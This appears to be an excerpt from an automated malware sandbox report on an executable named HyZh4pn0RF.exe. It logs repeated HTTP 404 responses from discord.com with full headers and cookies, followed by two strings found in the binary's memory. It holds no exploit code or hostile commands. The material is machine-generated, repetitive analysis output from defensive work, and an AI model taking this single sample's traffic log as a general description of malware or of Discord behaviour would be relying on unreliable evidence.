            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:10 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3a97a79a7cec11efb22fceb003a448a0; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453953x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fo0xIDXdk%2FEb2pBPcbbsLO%2F861QO1SXo8pyDfSImZ%2Btk0dzXI4e1u7z%2FRCV%2FKE1L%2FbKWjdZ45elUa7sU2iNnpM8EIGVqY5IgVvZiah1ee5aEdSrnPH9RuO7rBHTG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3a97a79a7cec11efb22fceb003a448a0a30708dd50747fb654ca905820209b63cb8882db4594a413bb62fdda33d67ddb; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:11 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3afd845c7cec11ef97469e0750befc3d; Expires=Wed, 26-Sep-2029 16:19:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 1x-ratelimit-reset: 1727453953x-ratelimit-reset-after: 2via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p9w6Hm%2BLNVwz0hn0%2FfzMj6E2MKCs37DSbqvW5AlakoQhJ1FfRD5rQ2o9tB0r1%2BPP%2FhLot20ZKtTquqefMB6bBq5KSJSGspfyVKIkwzyTMHyEZ9X9aulbPMFmKZjw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3afd845c7cec11ef97469e0750befc3d03996fc30570ab35836a8ac92ecebe2d236bc94c97af53f7fd9683c73c50609e; Expires=Wed, 26-Sep-2029 16:19:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=1776ad4596ce0722254a07daac3e820e46266c04-1727453951; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:15 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3d38dc6c7cec11efb31b2a3ebeb9a63a; Expires=Wed, 26-Sep-2029 16:19:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453956x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EO6AHeiMi7fYFfLEGWS9ziqMgNN20IDvQotdN70lFLR6bNNigkKwMrvAbOGUxT4Ont1O4gMOJ7mfoVXFC09%2BWR0TI3aCSmcbZhZwrysIxOic8lSb81J9%2BNN1JAgn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3d38dc6c7cec11efb31b2a3ebeb9a63ac715dba4bca04b42c203381de31eb28e75f4c84c74e77d1df6deb842be5834b2; Expires=Wed, 26-Sep-2029 16:19:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=4efeb2ea3a62e495dc352b88af2e585aefa65edc-1727453955; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:16 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3dc1a8587cec11ef820dd2e2dbf32e93; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453957x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FsnFqJvXlU%2BwbM284fPah8DEEMLoHF79%2ByVP3zX5yY6w2vcYVMJJP8CIgb8taqqDF%2Bi%2FN7UMhI7HMlyE3xLwHN%2BTxnaKQH3eDgSnveqrVJ4AfIAC4gZBqiPvUHDV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3dc1a8587cec11ef820dd2e2dbf32e937fca7de2edb84f95324207f86c51753bdba706d58d230b7676189baa895fcef8; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=54de805462c8499a30bede896a7ff29380fc6fc8-1727453956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:16 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3e251fdc7cec11ef963cbe4fcb513092; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453958x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6rjdjZ8kvmdTE%2B9gYZyS3cRo6znglB7LfM7m%2F42MoGnlGw4rRTTrGKAPNdeif3iRGaxI5YsftF9BaBUxxA6s6LR1%2BDJULwTdMmYSt4VNtJ7Dz70MJEEJWRf2WKl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3e251fdc7cec11ef963cbe4fcb513092934b8e633dcc6eb2e11fd1c92a5613ed8d8ebdb0dea4b547b3e1167c1e4bcc4b; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=54de805462c8499a30bede896a7ff29380fc6fc8-1727453956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:17 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3e8eacae7cec11efb084ba898f4f55ff; Expires=Wed, 26-Sep-2029 16:19:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453958x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBe5Lo%2BZ9POrxFT%2BX8e%2Fr39FsO2uZnqiHDXXLCg6xr5nmLq%2F9zrH3I3Q7mE7SVR1F0zAxLZtuCr7ec80lKoNMSRPKQWPeodfuMkPFfLOnThAC755nhiWy9qxORN7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3e8eacae7cec11efb084ba898f4f55ffa348a94986f4ef5989f8f29c7c0361ba202c30265a26f83609f9c4341f6e938a; Expires=Wed, 26-Sep-2029 16:19:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=0a8884e8c86705b67a0572bb98a4aef4adcfb203-1727453957; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:18 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3ef7a3b27cec11efb7d86adb8ffda96a; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453959x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abr%2BUjwiujgyO3tgGe0ukf1vX6sSJOD0Z0pRX16NhBSAGQvuLnHfBSKYjOmJPBN0cw8V3p1PVK8osR7Zw6WIVCE2ovtL9oqCWMFP0bOovDkWl2pL%2BoDNGxJyQhwG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3ef7a3b27cec11efb7d86adb8ffda96ac79ebdd9ab702b83537aa31e2267ad1cdce4093222083a94b0278809b91f97f3; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c387d6a5af5e9ff58e66aa3262890441f071e70d-1727453958; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:18 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3f60d4367cec11efb6bfce5421a2957b; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453960x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bfo6%2BpLH0xBtM%2B3RP9OD0OaZKkyoBbtUyrkI4KEgiIhXoy21wwjPyPhaip6vsf2%2FbnRDSgw5JnzTlgkNCUGCeebPqP%2B8rICPNLGNP4t0M3mjl2S4bP9crLF9nFcv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3f60d4367cec11efb6bfce5421a2957bcfeeea4512cfa12521770092496e33566f10872398fd18bed539d53360ec53db; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c387d6a5af5e9ff58e66aa3262890441f071e70d-1727453958; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:19 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3fcb19e07cec11efbb0972506fccbbd5; Expires=Wed, 26-Sep-2029 16:19:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453961x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CFlnKR2nBpAXtCrxQtK%2Bpf%2BMHsNlIZlHe8uyy43hvLsC0VLaCiG4p2D0NrlhpcR14RJ3XVwJMNGbijJvkbVG6mlKfKgrA4U1MmP968D%2BQdCRiI7os6sfD1hsrc21"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3fcb19e07cec11efbb0972506fccbbd52046978512bc3a3ff9e052d1d30ab1a6c95dea4efdeac673fad93551797fbe6d; Expires=Wed, 26-Sep-2029 16:19:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=e4739a2ca980cf72b6c40b39dd5676ede23582a9-1727453959; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:20 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=402fc8fe7cec11ef81c93a45c6a02b6a; Expires=Wed, 26-Sep-2029 16:19:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453961x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IqMEy1frYd0ukYO9EtMVw%2BsPqaLdhpbqcgjRQndVDBMlD5eejQ2PhVrmRBRAH1E%2FWJ1VCEzU2ok4RMCNbZEHYweiG%2BysPNKEOXoHnohl1bqdiF9hATknQzClundF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=402fc8fe7cec11ef81c93a45c6a02b6af1be99b918c971e3318b7f7702684800cab2e17a51b10f7d1029ef53d3341c53; Expires=Wed, 26-Sep-2029 16:19:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=2d2e75bff7344a90e4a667f73dabe89efa23a2ba-1727453960; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:22 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=41bc0bf67cec11efb1a5a6d8f199100f; Expires=Wed, 26-Sep-2029 16:19:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453964x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QK2%2FavJ7q0EEy1lDOKbuKgVuPHMluEIyKyqY7p2wcv7ZaG5caYZUHanDnRZ2g2gT5ut6B%2FSf2hM87wzRYHvSGsQ8%2BV5o%2FFwjz4u11digsZVRVxfpM%2Fbkqew2h8iY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=41bc0bf67cec11efb1a5a6d8f199100ffc8ec33858e1370b306ad38fdc6a81859e5d41b9cf3a6a7cac094cab1042ca91; Expires=Wed, 26-Sep-2029 16:19:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=f8d03ec6a155ae33fbe22a42cbc4732fd9e61759-1727453962; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:23 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=4221b9ce7cec11efb22a3ec234dfa563; Expires=Wed, 26-Sep-2029 16:19:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453964x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RajYrHLG6vYlTXPvHKXXhjCsRgoOTTBE9b8pSMTRKOiaJ7Xn9I%2Frut8jeq2aeq6wJE5i63BIrKrSWJ4YjS%2F%2Ftrs9ySiZumqHvXTCNsHFHAjjdonejEc7hqgvR7Cm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=4221b9ce7cec11efb22a3ec234dfa5633d4c3bceaa996435223b91e78539479daa6b9d5aea988528bc2590d600b05200; Expires=Wed, 26-Sep-2029 16:19:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=a6802797d16af97b5cc620c82515f6097c37a1f8-1727453963; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:24 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=42895d0e7cec11ef91567637d37b7708; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453965x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=442Djb16TyaSNYpe9QQFkoRlb6mTtnkFg4LNu2b%2F3PU7acl2c3vefCZ2Mp2ALhDR1FRPAuhhWLmBcR3an7k9pe1eeZ05M%2BdmVgyw3n6Piqw3DG4oBw3hqH5xUD7q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=42895d0e7cec11ef91567637d37b770897e59a5d830536b2e6f0e7ba71757f723feff8fed87ec33947345731484d413f; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=5b69cb651f261fca4009e01c081c789f863c139a-1727453964; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:24 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=42ef70bc7cec11ef816f96ff52647fd0; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453966x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tHjUECUG8xQx8OVrqY4MWG73YGJU5OhI53E4gSYsEnhvmydrNtTNA6pmyr%2FdtYKlhUArl1YV4%2FYy9t7LifUfwFSNi5EKNklsJvKIwetXSve0zrmLd4vQRR91aj8%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=42ef70bc7cec11ef816f96ff52647fd0cbfa5e1ea799c67133cb6f1f55fea7058518a3dd49dc71281a0b48ecc55cfa14; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=5b69cb651f261fca4009e01c081c789f863c139a-1727453964; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:25 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=4355db5e7cec11ef955696ff52647fd0; Expires=Wed, 26-Sep-2029 16:19:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453966x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4OtqYMhNtt%2FFa0xkAHhbtWzk1SbvdFFdBj%2Be%2FNvCqmvKWDF%2B%2F1KWE0zZ7nhRNU%2F47wHJpojTcHTYtkUgqbmxI1uz%2FnAanSjP%2BjHK3ecRvp%2FRn%2FW9PmBxyuZQmwO%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=4355db5e7cec11ef955696ff52647fd07750bdb5666355c6889dc3c5a2d74bf48f0809a7944cd902d3bbada349182fdb; Expires=Wed, 26-Sep-2029 16:19:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6afb30d70112b06f4af358280c90e707eb1bb5df-1727453965; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:26 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=43bc8f027cec11efb1b69e0750befc3d; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453967x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7aRYifyhXSJ6%2B4KmJFX6GZ1JJvEEF71HzufJCqJNUkiZKPwX8J6VbPs3%2BKaJijOO7NMHPbO2%2BSfVukhwbCnJ%2BZmENn9TNLSs%2BY1Of4DVJAbFvHAEzdFJcxh4S0VG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=43bc8f027cec11efb1b69e0750befc3ddab8243dea90a8e330eba2ca1b5755b0961219a7b124080cbf09b4289a9c7d74; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6fc67678e78038628973969bbb16166b1bae5b34-1727453966; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:26 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=44217a347cec11efb64d42324cf1d653; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453968x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RhAmd%2BZgeZSXvXSe2c8EFXJmvH9xMs8ffRMvTWD%2BgpEDiVj1TMorvgpWqgrbsk7u1kL5Cf3ARtIvN%2FZ8Lnq2QFouNZ%2Bcmg7JmG5uG9tVZ%2BgnuBGdTLb6EXHf7MM0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=44217a347cec11efb64d42324cf1d6536764891083d930e3854fe40f90838770b3b087220fb7038ae92c001653b71c5a; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6fc67678e78038628973969bbb16166b1bae5b34-1727453966; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:27 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=4487f5667cec11ef93fb42324cf1d653; Expires=Wed, 26-Sep-2029 16:19:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453968x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvdxsnH3VeoqPUjoomoUuU5c8X4zgMRKqnXawrANMhKwi6hhMdo5016rsX9NCYa6wykIQqKlxIU8ADnLaK42CVTwRiVl9J9124eWt428wUlCxaHoTqN9SAmm7D34"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=4487f5667cec11ef93fb42324cf1d653bd54605707d20d5da4787f34f71b3a8d76e986fb5ce1476f20fea179a32ef6d4; Expires=Wed, 26-Sep-2029 16:19:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=dff45fc3a172b052c868c8c498e3328f5153195d-1727453967; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826914311.000002539BBFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
            Source: HyZh4pn0RF.exe, 00000002.00000002.1823958561.000002539ACF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/vcpython27
